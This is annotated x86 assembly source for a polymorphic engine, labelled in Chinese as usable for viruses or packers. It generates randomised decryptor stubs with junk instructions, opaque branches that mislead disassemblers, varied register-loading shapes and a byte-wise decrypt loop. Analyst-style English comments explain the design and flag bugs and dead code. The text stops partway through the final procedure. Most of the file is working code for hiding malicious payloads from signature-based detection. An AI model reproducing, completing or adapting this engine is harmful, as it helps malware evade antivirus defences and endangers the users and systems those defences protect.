文章作者: 老丫
可以用于病毒,也可以用于壳
;.386
;.modelflat,stdcall;32bitmemorymodel
;optioncasemap:none;casesensitive
; NOTE(review): the three directives above are commented out, so this file is
; presumably included by a host that sets .386 / flat / stdcall itself; the
; procs below rely on stdcall (callers push args, callees use a plain ret).
.code
lbl_PolyStart:
; Start of the relocatable engine image. RealSize/SizeOfCode at the end of
; the file are measured from here. Every data item below lives in .code and
; is reached as Label[esi], where esi holds the load delta computed by the
; call/pop "PolyStart" trick in each proc.
;
; Analyst note: the decryptor this engine emits always has the same
; skeleton (length register setup, address register setup, byte-wise loop
; with one of six byte ops). Junk is limited to the five tables below plus
; the three branch shapes in GFI, which bounds what an emulator or a
; structural signature has to account for.
;
; Table convention: dw entries are little-endian, and the junk emitters
; write dh (high byte = opcode) before dl (low byte = ModRM base), so each
; word reads as "opcode ModRM" when the bytes land in the buffer.
;
; Exception-raising byte sequences. Not referenced by the visible code
; (GenSEHBlock is an empty stub).
SEHOpCode:
SEHInt1db0CDh,01h; int 1
SEHDiv0db33h,0C9h,0F7h,0F1h; xor ecx,ecx / div ecx (divide by zero)
; One-byte junk with a register field (2 entries): base opcode + reg number
OneByteOpCodedb40h,48h; inc r32 / dec r32
; One-byte fixed junk (4 entries): flag-only ops (cld also clears DF)
OneBytedb0F8h,0FCh,0F5h,0F9h; clc, cld, cmc, stc
; Two-byte reg,reg junk (9 entries): opcode, then ModRM = C0h + reg*8 + r/m
TwoByteOpCodedw08BC0h; mov r32, r/m32
dw033C0h; xor
dw003C0h; add
dw02BC0h; sub
dw021C0h; and
dw085C0h; test
dw03BC0h; cmp
dw009C0h; or
dw011C0h; adc r/m32, r32
; Two-byte fixed junk (2 entries). Unlike the one-byte fixed table these
; rewrite al/ah and the flags; they stay harmless only because eax is never
; one of the decryptor's working registers (see RandomReg).
TwoBytedw0D40Ah,0D50Ah; aam, aad
; Six-byte reg,imm32 junk (8 entries): opcode, ModRM base + reg, imm32
SixByteOpCodedw0C7C0h,081F0h,081E0h,081C8h; mov r32,imm32 / xor / and / or
dw0F7C0h,081F8h,081C0h,081E8h; test r32,imm32 / cmp / add / sub
; Opaque-branch table (9 entries) used by GFI. Indices 0..6 are even Jcc
; opcodes; GFI emits each followed by its complement (opcode + 1):
; jo/jno, jp/jnp, jb/jnb, jbe/ja, jle/jg, js/jns, jl/jge.
; Index 7 is jmp rel8 (EBh), index 8 is call rel32 (E8h).
RandOpCodedb70h,7Ah,72h,76h,7Eh,78h,7Ch,0EBh,0E8h
; jo,jno jp,jnp jb,jnb jbe,ja jle,jg js,jns jl,jge, jmp, call
; Table of the five junk tables (5 entries). GenerateRandOpCode loads an
; entry but dispatches on the index; the pointer itself goes unused.
RandomTableddoffsetOneByteOpCode,offsetOneByte
ddoffsetTwoByteOpCode,offsetTwoByte
ddoffsetSixByteOpCode
; Register numbers PolyEngine picks for the decryptor's address and length
; registers. RandomReg never returns either of them, which keeps the junk
; instructions off those registers.
Reg_StartAddressdd0
Reg_Lengthdd0
OP_MOVequ0B8h; not referenced in the visible code
OP_XORequ313400h; not referenced in the visible code
Randxdd0; not referenced in the visible code
pushallmacro
; Save the scratch registers the emitter procs clobber. edi is deliberately
; NOT saved: it is the output cursor and must advance across each call.
pusheax
pushecx
pushedx
pushebx
pushesi
endm
popallmacro
; Restore what pushall saved, in reverse order. edi is left as advanced.
popesi
popebx
popedx
popecx
popeax
endm
; CRC32: bit-serial CRC-32 (reflected polynomial EDB88320h, initial value
; and final xor FFFFFFFFh) over nLength bytes starting at Buf.
; stdcall: Buf, nLength on the stack; result in eax. Not called by the
; visible code.
; Register roles: esi = input cursor, edi = bytes remaining,
; dx:cx = running CRC (high word : low word), bx:ax = per-byte scratch.
; Clobbers flags only (ebx/ecx/edx pushed here, esi/edi via "uses").
; nLength = 0 is not checked: dec edi / jne would wrap around.
CRC32procusesesiediBuf:dword,nLength:dword
pushecx
pushedx
pushebx
movesi,Buf
movedi,nLength
xorecx,ecx
dececx; cx = FFFFh (low word of the initial CRC)
movedx,ecx; dx = FFFFh (high word)
NextByteCRC:
xoreax,eax
xorebx,ebx
lodsb; al = next input byte
xoral,cl; fold it into the low CRC byte
movcl,ch; shift dx:cx right by 8 bits ...
movch,dl
movdl,dh
movdh,8; ... and reuse dh as the bit counter
NextBitCRC:
shrbx,1; shift bx:ax right by one bit
rcrax,1
jncNoCRC; carry = the bit shifted out
xorax,08320h; low word of EDB88320h
xorbx,0EDB8h; high word of EDB88320h
NoCRC:decdh
jnzNextBitCRC
xorecx,eax; merge the byte's contribution into dx:cx
xoredx,ebx
decedi
jneNextByteCRC
notedx; final xor FFFFFFFFh
notecx
popebx
moveax,edx
roleax,16; eax = dx:cx
movax,cx
popedx
popecx
ret
CRC32endp
; RandSeed: LCG state written by Randomize and advanced by Random.
; Always accessed as RandSeed[esi] (esi = load delta).
RandSeeddd0
; Randomize: seed RandSeed from the time-stamp counter.
; No arguments; preserves all registers (pushad/popad).
Randomizeproc
pushad
callPolyStart; call/pop trick: esi = runtime address of PolyStart
PolyStart:
popesi
subesi,offsetPolyStart; esi = load delta (runtime minus link address)
db0fh,31h; rdtsc, hand-encoded: edx:eax = time-stamp counter
addeax,edx
movdwordptrRandSeed[esi],eax
popad
ret
Randomizeendp
; Random: one linear-congruential step; returns eax in 0..dwNumber-1.
; seed = seed*41C64E6Dh + 3039h (the classic ANSI C rand() constants),
; result = seed mod dwNumber. stdcall, one argument.
; edx/ecx are preserved via "uses"; esi is overwritten with the load delta
; (the value every caller already holds) and not restored; flags clobbered.
; dwNumber = 0 would fault on the div.
RandomprocusesedxecxdwNumber:dword
callPolyStart; esi = load delta (see Randomize)
PolyStart:
popesi
subesi,offsetPolyStart; relocate
moveax,RandSeed[esi]
movecx,41C64E6Dh; multiplier 1103515245
mulecx; edx:eax = seed * a; edx is discarded below
addeax,3039h; increment 12345
movRandSeed[esi],eax; store the new seed
xoredx,edx; clear edx before the unsigned divide
divdwNumber; edx = seed mod dwNumber
xchgeax,edx; return the remainder in eax
ret
Randomendp
; RandomReg: return in eax a random register number in 0..dwNumber-1
; (callers pass 8) that is not esp (4), not ebp (5) and not one of the two
; registers stored in Reg_StartAddress/Reg_Length. Because those slots
; start at 0, register 0 (eax) is also rejected while they still hold 0.
; stdcall, one argument; sets esi to the load delta; clobbers flags.
; Loops on Rep8 until an acceptable register comes up.
RandomRegprocdwNumber:dword
callPolyStart; esi = load delta
PolyStart:
popesi
subesi,offsetPolyStart; relocate
Rep8:
pushdwNumber
callRandom
cmpeax,4; skip esp: keep the stack pointer untouched
jzRep8
cmpeax,5; skip ebp: frame pointer for the procs' arguments
jzRep8
cmpeax,Reg_StartAddress[esi]; skip the decryptor's address register
jzRep8
cmpeax,Reg_Length[esi]; skip the decryptor's length register
jzRep8
ret
RandomRegendp
; Sub_OneByteOpCode: emit one "inc r32" or "dec r32" (40h/48h + reg) on a
; random non-protected register at [edi] and advance edi by 1.
; Emits exactly one instruction; the repeat count lives in
; GenerateRandOpCode. Expects esi = load delta, edi = output cursor;
; preserves everything but edi and flags (pushall/popall).
Sub_OneByteOpCodeproc
pushall
push2
callRandom; 0..1: inc or dec
leaebx,OneByteOpCode[esi+eax]; address of the table entry
movzxedx,byteptr[ebx]; edx = base opcode
pushedx; keep it across RandomReg
Rep9:
push8
callRandomReg; random register in eax..edi, minus the protected ones
cmpeax,Reg_Length[esi]; redundant: RandomReg already rejects these two
jzRep9
cmpeax,Reg_StartAddress[esi]
jzRep9
popedx
adddl,al; opcode += register number
movbyteptr[edi],dl
incedi
popall
ret
Sub_OneByteOpCodeendp
; Sub_OneByte: emit one of clc/cld/cmc/stc from the OneByte table at [edi]
; and advance edi by 1. (The original comment listed aaa/aas; the table
; holds only the four flag instructions.) Expects esi = load delta;
; preserves everything but edi and flags.
Sub_OneByteproc
pushall
push4
callRandom; 0..3: table index
leaebx,OneByte[esi+eax]; address of the table entry
movzxedx,byteptr[ebx]; edx = opcode
movbyteptr[edi],dl
incedi
popall
ret
Sub_OneByteendp
; Sub_TwoByteOpCode: emit one two-byte "op r32, r32" from TwoByteOpCode
; (mov/xor/add/sub/and/test/cmp/or/adc) using two random non-protected
; registers. Output: opcode, then ModRM = C0h + (reg2 << 3) + reg1, i.e.
; the reg field is the second pick and r/m the first. Advances edi by 2.
; The two picks may coincide (no check). Expects esi = load delta;
; preserves everything but edi and flags.
Sub_TwoByteOpCodeproc
pushall
push9
callRandom; 0..8: table index
leaebx,TwoByteOpCode[esi+eax*2]
movzxedx,wordptr[ebx]; dh = opcode, dl = C0h
pushedx; keep it across the two RandomReg calls
Rep10:
push8
callRandomReg; first register -> r/m field
cmpeax,Reg_Length[esi]; redundant re-check (RandomReg already filters)
jzRep10
cmpeax,Reg_StartAddress[esi]
jzRep10
movebx,eax; ebx = first register
Rep11:
push8
callRandomReg; second register -> reg field
cmpeax,Reg_Length[esi]
jzRep11
cmpeax,Reg_StartAddress[esi]
jzRep11
movcl,8; ecx is safe to use: pushall saved it
mulcl; al = reg2 * 8
popedx
adddl,al; ModRM += reg2 << 3
adddl,bl; ModRM += reg1
movbyteptr[edi],dh; opcode
incedi
movbyteptr[edi],dl; ModRM
incedi
popall
ret
Sub_TwoByteOpCodeendp
; Sub_TwoByte: emit aam (D4 0A) or aad (D5 0A) at [edi]; advances edi by 2.
; Both rewrite al/ah and the flags, unlike the other fixed junk.
; Expects esi = load delta; preserves everything but edi and flags.
Sub_TwoByteproc
pushall
push2
callRandom; 0..1: aam or aad
leaebx,TwoByte[esi+eax*2]
movdx,wordptr[ebx]; dh = opcode, dl = 0Ah
movbyteptr[edi],dh
incedi
movbyteptr[edi],dl
incedi
popall
ret
Sub_TwoByteendp
; Sub_SixByteOpCode: emit one "op r32, imm32" from SixByteOpCode
; (mov/xor/and/or/test/cmp/add/sub) on a random non-protected register
; with a random immediate below 600000h. Output: opcode, ModRM base + reg,
; then the 4 immediate bytes; advances edi by 6. Expects esi = load delta;
; preserves everything but edi and flags.
Sub_SixByteOpCodeproc
pushall
push8
callRandom; 0..7: table index
leaebx,SixByteOpCode[esi+eax*2]
movdx,wordptr[ebx]; dh = opcode, dl = ModRM base
pushedx; keep it across RandomReg
Rep12:
push8
callRandomReg; random non-protected register
cmpeax,Reg_Length[esi]; redundant re-check (RandomReg already filters)
jzRep12
cmpeax,Reg_StartAddress[esi]
jzRep12
popedx
adddl,al; ModRM += register number
movbyteptr[edi],dh; opcode
incedi
movbyteptr[edi],dl; ModRM
incedi
push600000h
callRandom; imm32 in 0..5FFFFFh
movdwordptr[edi],eax
addedi,4
popall
ret
Sub_SixByteOpCodeendp
; GenSEHBlock: stub that emits nothing. The SEHOpCode table is therefore
; unused by the visible code.
GenSEHBlockproc
ret
GenSEHBlockendp
; GenerateRandOpCode: emit a run of 1..10 random junk instructions at edi
; (the original comment says 0..9, but the inc after Random makes it 1..10).
; Each instruction comes from one of the five Sub_* emitters, chosen
; uniformly. Expects esi = load delta, edi = output cursor; preserves
; everything but edi and flags.
GenerateRandOpCodeproc
pushall
push10
callRandom; 0..9
inceax; count = 1..10
movecx,eax; ecx = instructions still to emit (pushall saved it)
Rep13:
pushecx; belt and braces: Random declares "uses ecx" anyway
push5
callRandom; 0..4: which emitter
movebx,eax
movedx,RandomTable[esi+ebx*4]; table address (computed but unused:
leaedx,[edx+esi]; the Sub_* procs index their own tables)
cmpebx,0
jzlbl_OneByteOpCode; 0: inc/dec r32
cmpebx,1
jzlbl_OneByte; 1: clc/cld/cmc/stc
cmpebx,2
jzlbl_TwoByteOpCode; 2: op r32, r32
cmpebx,3
jzlbl_TwoByte; 3: aam/aad
jmplbl_SixByteOpCode; 4: op r32, imm32
lbl_OneByteOpCode:
callSub_OneByteOpCode
jmplbl_Next1
lbl_OneByte:
callSub_OneByte
jmplbl_Next1
lbl_TwoByteOpCode:
callSub_TwoByteOpCode
jmplbl_Next1
lbl_TwoByte:
callSub_TwoByte
jmplbl_Next1
lbl_SixByteOpCode:
callSub_SixByteOpCode
lbl_Next1:
popecx
dececx
jnzRep13; next junk instruction
popall
ret
GenerateRandOpCodeendp
; FillRandomCode: write dwLength2 random bytes (values 0..254, since
; Random is called with 0FFh) at edi and advance edi by dwLength2.
; stdcall, one argument; preserves everything but edi and flags.
; dwLength2 = 0 is not handled ("loop" would wrap); GFI passes 1..5.
FillRandomCodeprocdwLength2:dword
pushall
movecx,dwLength2; ecx = bytes left (pushall saved it)
Rep14:
push0FFh
callRandom; 0..254
movbyteptr[edi],al
incedi
loopRep14
popall
ret
FillRandomCodeendp
; GFI: emit one "opaque branch" sequence at edi so that a linear
; disassembly misreads the bytes in between. One of three shapes:
;   Jcc rel8 (n+2) ; J!cc rel8 (n) ; n random bytes              n = 1..5
;   jmp rel8 (n+1) ; db E8h        ; n random bytes              n = 1..4
;   call rel32 (n+1) ; n random bytes ; 1 unwritten byte ; pop r32  n = 1..4
; Each shape transfers control to the byte after the filler; the call
; shape pops its own return address, so the stack stays balanced and no
; flags are modified by any shape. Expects esi = load delta, edi = output
; cursor; preserves everything but edi and flags.
GFIproc
pushall
push9
callRandom; 0..8: index into RandOpCode
cmpeax,7
jzlbl_Jmp; 7 = jmp rel8
cmpeax,8
jzlbl_Call; 8 = call rel32
leaebx,RandOpCode[esi+eax]; 0..6: a Jcc with an even opcode
movzxedx,byteptr[ebx]
movbyteptr[edi],dl; Jcc
incedi
push5
callRandom
addeax,3; rel8 = 3..7 = 2 (the J!cc) + filler length
movbyteptr[edi],al
incedi
incdl; opcode + 1 = the complementary condition
movbyteptr[edi],dl; J!cc
incedi
deceax
deceax; rel8 = 1..5 = filler length
movbyteptr[edi],al
incedi
pusheax
callFillRandomCode; filler neither branch executes
jmplbl_Exit1
lbl_Jmp:
leaebx,RandOpCode[esi+eax]
movzxedx,byteptr[ebx]
movbyteptr[edi],dl; EBh = jmp rel8 (the original comment said E9h)
incedi
push4
callRandom
inceax
inceax; rel8 = 2..5
movbyteptr[edi],al
incedi
movbyteptr[edi],0E8h; decoy "call" opcode, never executed
incedi
deceax; 1..4 further filler bytes (E8h + filler = rel8 bytes)
pusheax
callFillRandomCode
jmplbl_Exit1
lbl_Call:
leaebx,RandOpCode[esi+eax]
movzxedx,byteptr[ebx]
movbyteptr[edi],dl; E8h = call rel32
incedi
push4
callRandom
inceax
inceax; rel32 = 2..5
movdwordptr[edi],eax
addedi,4
; edi is not advanced past the decoy byte here (unlike lbl_Jmp), so the
; FillRandomCode call overwrites it, and the inc edi afterwards leaves the
; last byte of the skipped range unwritten.
movbyteptr[edi],0E9h
deceax; 1..4 filler bytes
pusheax
callFillRandomCode
incedi
push8
callRandomReg; random non-protected register
movedx,58h; 58h + reg = pop r32
addedx,eax
movbyteptr[edi],dl; discards the return address pushed by the call
incedi
lbl_Exit1:
popall
ret
GFIendp
; G1Code: emit decryptor part 1, which leaves dwLength1 in register "reg"
; (the length register) using one of five equivalent shapes chosen by
; Random(5). Junk (GenerateRandOpCode) and one opaque branch (GFI) are
; placed between the two halves of each shape:
;   0: mov reg, len-r      ; add reg, r
;   1: push len            ; pop reg
;   2: mov reg, len xor r  ; xor reg, r
;   3: mov reg, not len    ; not reg
;   4: mov reg, ror(len,c) ; rol reg, c          (c = 0..31)
; Two-byte opcodes are built in dx and stored with "mov word ptr", which
; writes dl (opcode) before dh (ModRM = C0h + reg).
; stdcall: dwLength1, reg (register number 0..7). Expects esi = load
; delta, edi = output cursor; preserves everything but edi and flags.
; The junk emitters never touch "reg" because PolyEngine passes
; Reg_Length, which RandomReg excludes. The r value in eax survives the
; emitter calls because they restore eax.
G1CodeprocdwLength1:dword,reg:dword
pushall
movebx,dwLength1; ebx = value to materialise
push5
callRandom; 0..4 selects the shape
cmpeax,1
jzlbl_PushPopG1
cmpeax,2
jzlbl_MovXorG1
cmpeax,3
jzlbl_MovNotG1
cmpeax,4
jzlbl_MovRolG1
lbl_MovAddG1:
push0FFFFFFFFh
callRandom; eax = r
subebx,eax; ebx = len - r
movedx,0C0C7h; C7 C0+reg: mov r32, imm32
movecx,reg
adddh,cl; ModRM += reg
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx; imm32 = len - r
addedi,4
callGenerateRandOpCode; junk
callGFI; opaque branch
movedx,0C081h; 81 C0+reg: add r32, imm32
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],eax; imm32 = r
addedi,4
jmplbl_Exit2
lbl_PushPopG1:
movbyteptr[edi],68h; push imm32
incedi
movdwordptr[edi],ebx; imm32 = len
addedi,4
callGenerateRandOpCode; junk (stack-neutral, see GFI)
callGFI
movedx,58h; 58h + reg: pop r32
addedx,reg
movbyteptr[edi],dl
incedi
jmplbl_Exit2
lbl_MovXorG1:
push0FFFFFFFFh
callRandom; eax = r
xorebx,eax; ebx = len xor r
movedx,0C0C7h; mov r32, imm32
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx; imm32 = len xor r
addedi,4
callGenerateRandOpCode
callGFI
movedx,0F081h; 81 F0+reg: xor r32, imm32
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],eax; imm32 = r (the original comment said "add")
addedi,4
jmplbl_Exit2
lbl_MovNotG1:
notebx; ebx = not len
movedx,0C0C7h; mov r32, imm32
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx; imm32 = not len
addedi,4
callGenerateRandOpCode
callGFI
movedx,0D0F7h; F7 D0+reg: not r32
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
jmplbl_Exit2
lbl_MovRolG1:
push020h
callRandom; eax = c, 0..31
movcl,al
pusheax; keep c for the rol immediate
rorebx,cl; ebx = ror(len, c)
movedx,0C0C7h; mov r32, imm32
moveax,reg
adddh,al
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx; imm32 = ror(len, c)
addedi,4
callGenerateRandOpCode
callGFI
movedx,0C0C1h; C1 C0+reg: rol r32, imm8
moveax,reg
adddh,al
movwordptr[edi],dx
incedi
incedi
popeax
movbyteptr[edi],al; imm8 = c, which undoes the ror
incedi
lbl_Exit2:
popall
ret
G1Codeendp
; G2Code: emit decryptor part 2, which loads the address register "reg"
; with the start address of the encrypted code, a value not yet known
; here. Same five shapes as G1Code, but every immediate is written as a 0
; placeholder and the buffer address of each slot is recorded:
; AddressOfCode1[esi] = first half, AddressOfCode2[esi] = second half
; (shapes 0, 2 and 4 only), G2Selected[esi] = shape number. PolyEngine
; patches the slots once the address is known.
; stdcall: reg. Expects esi = load delta, edi = output cursor; preserves
; everything but edi and flags.
G2Codeprocreg:dword
pushall
push5
callRandom; 0..4 selects the shape (same numbering as G1Code)
cmpeax,1
jzlbl_PushPopG2
cmpeax,2
jzlbl_MovXorG2
cmpeax,3
jzlbl_MovNotG2
cmpeax,4
jzlbl_MovRolG2
lbl_MovAddG2:
movG2Selected[esi],0; shape 0: mov reg, A-r / add reg, r
movedx,0C0C7h; C7 C0+reg: mov r32, imm32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi; slot 1 = the mov immediate
movdwordptr[edi],0; placeholder
addedi,4
callGenerateRandOpCode; junk
callGFI; opaque branch
movedx,0C081h; 81 C0+reg: add r32, imm32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode2[esi],edi; slot 2 = the add immediate
movdwordptr[edi],0; placeholder
addedi,4
jmplbl_Exit3
lbl_PushPopG2:
movG2Selected[esi],1; shape 1: push A / pop reg
movbyteptr[edi],68h; push imm32
incedi
movAddressOfCode1[esi],edi; slot 1 = the push immediate
movdwordptr[edi],0; placeholder
addedi,4
callGenerateRandOpCode
callGFI
movedx,58h; 58h + reg: pop r32
addedx,reg
movbyteptr[edi],dl
incedi
jmplbl_Exit3
lbl_MovXorG2:
movG2Selected[esi],2; shape 2: mov reg, A xor r / xor reg, r
movedx,0C0C7h; mov r32, imm32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi; slot 1 = the mov immediate
movdwordptr[edi],0; placeholder
addedi,4
callGenerateRandOpCode
callGFI
movedx,0F081h; 81 F0+reg: xor r32, imm32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode2[esi],edi; slot 2 = the xor immediate
movdwordptr[edi],0; placeholder
addedi,4
jmplbl_Exit3
lbl_MovNotG2:
movG2Selected[esi],3; shape 3: mov reg, not A / not reg
notebx; no effect: ebx is reloaded from reg on the next line
movedx,0C0C7h; mov r32, imm32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi; slot 1 = the mov immediate
movdwordptr[edi],0; placeholder
addedi,4
callGenerateRandOpCode
callGFI
movedx,0D0F7h; F7 D0+reg: not r32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
jmplbl_Exit3
lbl_MovRolG2:
movG2Selected[esi],4; shape 4: mov reg, ror(A,c) / rol reg, c
movedx,0C0C7h; mov r32, imm32
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi; slot 1 = the mov immediate
movdwordptr[edi],0; placeholder
addedi,4
callGenerateRandOpCode
callGFI
movedx,0C0C1h; C1 C0+reg: rol r32, imm8
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode2[esi],edi; slot 2 = the one-byte rotate count
movbyteptr[edi],0; placeholder
incedi
lbl_Exit3:
popall
ret
G2Codeendp
; G3Code: emit decryptor part 3, the single-byte decrypt step applied to
; [regOfAddr]. The operation is chosen by Random(8) and its number is
; stored in EncryptSelected[esi] so that PolyEngine applies the inverse
; when it encrypts:
;   0 (and 6, 7): xor byte ptr [reg], key     <- encrypt: xor
;   1: sub byte ptr [reg], key                <- encrypt: add
;   2: add byte ptr [reg], key                <- encrypt: sub
;   3: dec byte ptr [reg]                     <- encrypt: inc
;   4: inc byte ptr [reg]                     <- encrypt: dec
;   5: not byte ptr [reg]                     <- encrypt: not
; lbl_RolG3/lbl_RorG3 are unreachable: their dispatch lines are commented
; out, so 6 and 7 fall through to xor.
; ModRM is 00h + reg (memory operand, no displacement); regOfAddr is never
; 4 or 5 (RandomReg), which with mod=00 would mean SIB/disp32 instead of
; [esp]/[ebp]. Words built in dx are stored low byte (opcode) first.
; stdcall: regOfAddr, key. Expects esi = load delta, edi = output
; cursor; preserves everything but edi and flags.
G3CodeprocregOfAddr:dword,key:dword
pushall
push8; 0..7
callRandom; selects the decrypt operation
cmpeax,1
jzlbl_AddG3
cmpeax,2
jzlbl_SubG3
cmpeax,3
jzlbl_IncG3
cmpeax,4
jzlbl_DecG3
cmpeax,5
jzlbl_NotG3
;cmpeax,6
;jzlbl_Rol
;cmpeax,7
;jzlbl_Ror
lbl_XorG3:
movEncryptSelected[esi],0; encrypt side: xor
movedx,3080h; 80 30+reg: xor byte ptr [reg], imm8
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
movedx,key
movbyteptr[edi],dl; imm8 = key
incedi
jmplbl_Exit4
lbl_AddG3:
movEncryptSelected[esi],1; encrypt side: add
movedx,2880h; 80 28+reg: sub byte ptr [reg], imm8
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
movedx,key
movbyteptr[edi],dl; imm8 = key
incedi
jmplbl_Exit4
lbl_SubG3:
movEncryptSelected[esi],2; encrypt side: sub
movedx,0080h; 80 00+reg: add byte ptr [reg], imm8
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
movedx,key
movbyteptr[edi],dl; imm8 = key
incedi
jmplbl_Exit4
lbl_IncG3:
movEncryptSelected[esi],3; encrypt side: inc
movedx,008FEh; FE 08+reg: dec byte ptr [reg]
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
jmplbl_Exit4
lbl_DecG3:
movEncryptSelected[esi],4; encrypt side: dec
movedx,000FEh; FE 00+reg: inc byte ptr [reg]
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
jmplbl_Exit4
lbl_NotG3:
movEncryptSelected[esi],5; encrypt side: not
movedx,010F6h; F6 10+reg: not byte ptr [reg]
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
jmplbl_Exit4
lbl_RolG3:
movEncryptSelected[esi],6; unreachable (see header)
moveax,key
xoredx,edx
movecx,20h
divecx; edx = key mod 32
movcl,dl
movedx,51h; push ecx
movbyteptr[edi],dl
incedi
pushecx
callGFI
popecx
movedx,0C1C6h; C6 C1: mov cl, imm8
movwordptr[edi],dx
incedi
incedi
movbyteptr[edi],cl
incedi
callGFI
movedx,008D3h; D3 08+reg: ror dword ptr [reg], cl (no matching pop ecx is emitted)
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
jmplbl_Exit4
lbl_RorG3:
movEncryptSelected[esi],7; unreachable (see header)
moveax,key
xoredx,edx
movecx,20h
divecx; edx = key mod 32
movcl,dl
movedx,51h; push ecx
movbyteptr[edi],dl
incedi
pushecx
callGFI
popecx
movedx,0C1C6h; C6 C1: mov cl, imm8
movwordptr[edi],dx
incedi
incedi
movbyteptr[edi],cl
incedi
callGFI
movedx,000D3h; D3 00+reg: rol dword ptr [reg], cl (no matching pop ecx is emitted)
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
lbl_Exit4:
popall
ret
G3Codeendp
pGetModuleCodedd0; not referenced by live code (only by the commented-out block below)
; G4Code: emit decryptor part 4, the loop that applies the part-3 step to
; every byte. Two shapes, chosen by Random(2):
;   1 (lbl_Loop):   push addr ; mov ecx, len ; L: push ecx ; <part 3> ;
;                   inc addr ; pop ecx ; loop L ; pop addr
;   0 (lbl_DecJge): push addr ; L: <part 3> ; inc addr ; dec len ;
;                   jg L ; pop addr
; Junk (GenerateRandOpCode) and opaque branches (GFI) are interleaved at
; fixed points. In shape 1 ecx is pushed around the junk because junk may
; use ecx, and the shape is re-rolled when regOfAddr is ecx. In shape 0 the
; GFI between dec and jg does not alter flags (see GFI). The backward
; displacement is the low byte of (loop address - edi). Both shapes end by
; restoring the address register. EntryPoint is unused: the tail that
; would jump to the original entry point is commented out.
; stdcall: regOfLen, regOfAddr, key, EntryPoint. Expects esi = load
; delta, edi = output cursor; preserves everything but edi and flags.
G4CodeprocregOfLen:dword,regOfAddr:dword,key:dword,EntryPoint:dword
pushall
rep100:
push2
callRandom; 0..1 selects the shape
cmpeax,0
jzlbl_DecJge
cmpregOfAddr,1; shape 1 needs ecx free: re-roll if the address register is ecx
jzrep100
;pushreg00保护首地址寄存器
;movecx,reg11长度寄存器
;Rep:
;Xordwordptr[reg00],key
;increg00
;LoopRep
;popreg00
; (author's sketch of shape 1: push addr / mov ecx, len / Rep: op [addr],key /
;  inc addr / loop Rep / pop addr)
lbl_Loop:
movedx,50h; 50h + reg: push addr
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode; junk
callGFI; opaque branch
movedx,0C88Bh; 8B C8+reg: mov ecx, len
movebx,regOfLen
adddh,bl
movwordptr[edi],dx
incedi
incedi
callGFI
pushedi
popedx
pushedx; save the loop target (address of the "push ecx" below)
callGFI
movbyteptr[edi],51h; push ecx: the junk below may touch ecx
incedi
callGenerateRandOpCode; junk
callGFI; opaque branch
pushkey
pushregOfAddr
callG3Code; part 3: the byte decrypt step
callGFI; opaque branch
movedx,40h; 40h + reg: inc addr
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode
movbyteptr[edi],59h; pop ecx
incedi
callGFI; opaque branch
movedx,0E2h; E2: loop rel8
movbyteptr[edi],dl
;incedi
incedi
movbyteptr[edi],0; displacement placeholder
incedi
popedx; saved loop target
subedx,edi; target - address after the loop instruction
movbyteptr[edi-1],dl; patch the rel8
movedx,58h; 58h + reg: pop addr
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGFI
;invokeVirtualAlloc,NULL,1000h,MEM_COMMIT,PAGE_EXECUTE_READWRITE
;oreax,eax
;jzlbl_Exit5
;movpGetModuleCode,eax
callGenerateRandOpCode
callGFI
; The block below (get-module stub, push EntryPoint / ret) is disabled;
; the emitted code therefore ends after the junk above.
;pushEn_ImageBase
;pushNewRva
;pushedi
;callGenerateGetModule
;movbyteptr[edi],68h;PushEntryPoint
;incedi
;movedx,EntryPoint
;movdwordptr[edi],edx
;addedi,4
;callGenerateRandOpCode
;callGFI
;movbyteptr[edi],0C3h;Ret
;incedi
jmplbl_Exit5
lbl_DecJge:
movedx,50h; 50h + reg: push addr
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode; junk
callGFI; opaque branch
callGFI; opaque branch
pushedi
popedx
pushedx; save the loop target (start of part 3's GFI)
callGFI; opaque branch
pushkey
pushregOfAddr
callG3Code; part 3: xor/sub/add/dec/inc/not on [addr]
callGFI; opaque branch
movedx,40h; 40h + reg: inc addr
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGFI; opaque branch
movedx,48h; 48h + reg: dec len
addedx,regOfLen
movbyteptr[edi],dl
incedi
callGFI
movedx,07fh; 7F: jg rel8 (the original comment says jge, which would be 7D)
movbyteptr[edi],dl
incedi
movbyteptr[edi],0; displacement placeholder
incedi
popedx; saved loop target
subedx,edi; target - address after the jg
movbyteptr[edi-1],dl; patch the rel8
callGenerateRandOpCode
callGFI
;pushEn_ImageBase
;pushNewRva
;pushedi
;callGenerateGetModule
callGenerateRandOpCode
callGFI
movedx,58h; 58h + reg: pop addr
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode
callGFI
